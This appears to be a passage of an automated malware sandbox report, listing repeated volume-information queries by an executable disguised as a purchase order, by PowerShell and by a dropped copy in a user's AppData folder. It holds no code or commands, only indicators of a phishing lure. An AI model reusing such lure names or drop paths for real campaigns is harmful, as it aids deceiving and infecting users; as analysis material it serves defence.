                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeQueries volume information: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe VolumeInformation
